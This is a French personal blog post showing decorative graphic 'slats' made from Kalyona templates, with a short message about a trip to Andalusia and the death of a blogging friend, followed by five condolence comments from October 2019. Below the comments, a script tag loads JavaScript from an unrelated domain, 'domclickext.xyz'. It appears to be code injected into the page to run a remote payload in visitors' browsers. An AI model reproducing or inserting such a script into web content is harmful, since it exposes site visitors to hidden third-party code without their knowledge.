• **Sur des slats de Kalyona**

     

    **Sur des slats de Kalyona**

    Bien le bonjour à tous,

     

    me voilà de retour de mon voyage en Andalousie.

     

    J'ai appris le décès de notre amie très chère, Blandine ou Angélique 

     

    et j'en suis toute retournée…..

    Je tenais à le dire.

     

    gros bisous

     

    **Sur des slats de Kalyona**

    harmonie

    **Sur des slats de Kalyona**

    bonne journ?e

    **Sur des slats de Kalyona**

     

    soeurs jumellees

     

    **Sur des slats de Kalyona**

    « **Couleurs d'Automne**selon Kaly**Journées d' Automne**pals IM »
    Pin It

  • Commentaires

    5
    Lundi 21 Octobre 2019 à 10:36

    Coucou ma Tite Douce,merci pour ta page ...C'est bien de voyager et de pouvoir

    visiter cet ailleurs..L'Andalousie doit être magnifique...

    Oui notre Douce Amie s'en est allée dans le grand Paradis d'Amour...

    Une Maladie tellement rapide...Oups...Là elle ne souffre plus

    et nous surveille avec son si joli sourire.Merci pour tes gentilles pensées

    ma Poupette,c'est adorable.La vie est un cadeau,donc profitons en encore

    un peu.Bonne semaine a Toi Selly.Mille gros bisous du Coeur*

    lundi 21 octobre 2019

    4
    Dimanche 20 Octobre 2019 à 18:20

    SUPERBES CREATIONS, ma Douce, j'aime beaucoup !

    Je ne connaissais pas Angélique, mais il est toujours triste de voir partir une amie. Pensées à sa famille et à toi dans la peine.

    J'espère que ton voyage t'a donné toute satisfaction.

    BONNE SEMAINE et gros bisous tendres. Coryphee

     

    3
    Dimanche 20 Octobre 2019 à 11:10

    bonjour Sellena 

    c'est triste pour ton amie

    bonne journée bisous

    2
    Dimanche 20 Octobre 2019 à 09:59

    Bonjour sellena

    superbes tes créations slats bravo

    Je ne connaissais pas Blandine

    mais c'est toujours triste de voir partir

    une personne d'un blog

    bon dimanche bisous

     

     

    1
    Dimanche 20 Octobre 2019 à 08:47

    Bonjour et bonne journée Sellena 

    je ne connais pas ton amie 

    toutes mes condoléances a a famille

    bisous

     

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :